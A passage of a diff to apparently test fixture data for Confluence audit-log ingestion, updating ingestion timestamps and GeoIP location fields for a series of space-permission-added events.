@@ -3270,7 +3066,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045180886Z", + "ingested": "2021-12-14T14:34:52.859163681Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":479000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3351,20 +3147,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3372,7 +3162,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045182671Z", + "ingested": "2021-12-14T14:34:52.859164162Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":481000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3447,20 +3237,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3468,7 +3252,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045184367Z", + "ingested": "2021-12-14T14:34:52.859164532Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":484000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3549,20 +3333,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3570,7 +3348,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045186049Z", + "ingested": "2021-12-14T14:34:52.859164969Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":486000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3651,20 +3429,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3672,7 +3444,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045187722Z", + "ingested": "2021-12-14T14:34:52.859165328Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":489000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3747,20 +3519,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3768,7 +3534,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045189474Z", + "ingested": "2021-12-14T14:34:52.859165686Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":491000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3849,20 +3615,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3870,7 +3630,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045191158Z", + "ingested": "2021-12-14T14:34:52.859166044Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":493000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3951,20 +3711,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3972,7 +3726,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045192835Z", + "ingested": "2021-12-14T14:34:52.859166423Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":496000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4047,20 +3801,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4068,7 +3816,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045194512Z", + "ingested": "2021-12-14T14:34:52.859166787Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":498000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4149,20 +3897,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4170,7 +3912,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045196189Z", + "ingested": "2021-12-14T14:34:52.859167153Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":501000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4251,20 +3993,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4272,7 +4008,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045197884Z", + "ingested": "2021-12-14T14:34:52.859167513Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":503000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4347,20 +4083,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4368,7 +4098,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045199577Z", + "ingested": "2021-12-14T14:34:52.859167875Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":506000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4449,20 +4179,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4470,7 +4194,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045201269Z", + "ingested": "2021-12-14T14:34:52.859168229Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":508000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4551,20 +4275,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4572,7 +4290,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045202943Z", + "ingested": "2021-12-14T14:34:52.859168709Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":510000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4647,20 +4365,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4668,7 +4380,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045204629Z", + "ingested": "2021-12-14T14:34:52.859169063Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":513000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4749,20 +4461,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4770,7 +4476,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045206337Z", + "ingested": "2021-12-14T14:34:52.859169431Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":515000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4851,20 +4557,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4872,7 +4572,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045208017Z", + "ingested": "2021-12-14T14:34:52.859169785Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":518000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4947,20 +4647,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4968,7 +4662,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045209768Z", + "ingested": "2021-12-14T14:34:52.859170276Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission 